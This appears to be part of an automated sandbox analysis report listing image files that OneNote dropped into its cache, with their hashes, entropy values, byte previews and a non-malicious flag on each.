                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000085.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):140755
                                                                                                                                                                                                                  Entropy (8bit):7.9013245181576695
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                                                                                                  MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                                                                                                  SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                                                                                                  SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                                                                                                  SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000087.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):129887
                                                                                                                                                                                                                  Entropy (8bit):7.8877849553452695
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                                                                                                  MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                                                                                                  SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                                                                                                  SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                                                                                                  SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000089.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):84941
                                                                                                                                                                                                                  Entropy (8bit):7.966881945560921
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                                                                                                  MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                                                                                                  SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                                                                                                  SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                                                                                                  SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1569
                                                                                                                                                                                                                  Entropy (8bit):7.583832946136897
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                                                                                                  MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                                                                                                  SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                                                                                                  SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                                                                                                  SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40035
                                                                                                                                                                                                                  Entropy (8bit):7.360144465307449
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                                                                                                  MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                                                                                                  SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                                                                                                  SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                                                                                                  SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):242903
                                                                                                                                                                                                                  Entropy (8bit):7.944495275553473
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                                                                                                  MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                                                                                                  SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                                                                                                  SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                                                                                                  SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):70028
                                                                                                                                                                                                                  Entropy (8bit):7.742089280742944
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                                                                                                  MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                                                                                                  SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                                                                                                  SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                                                                                                  SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24268
                                                                                                                                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):47294
                                                                                                                                                                                                                  Entropy (8bit):7.497888607667405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                                                                                                  MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                                                                                                  SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                                                                                                  SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                                                                                                  SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):347
                                                                                                                                                                                                                  Entropy (8bit):6.85024426015615
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                                                                                                  MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                                                                                                  SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                                                                                                  SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                                                                                                  SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):827
                                                                                                                                                                                                                  Entropy (8bit):7.23139555596658
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                                                                                                  MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                                                                                                  SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                                                                                                  SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                                                                                                  SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4410
                                                                                                                                                                                                                  Entropy (8bit):7.857636973514526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                                                                                                  MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                                                                                                  SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                                                                                                  SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                                                                                                  SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):136726
                                                                                                                                                                                                                  Entropy (8bit):7.973487854173386
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                                                                                                  MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                                                                                                  SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                                                                                                  SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                                                                                                  SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
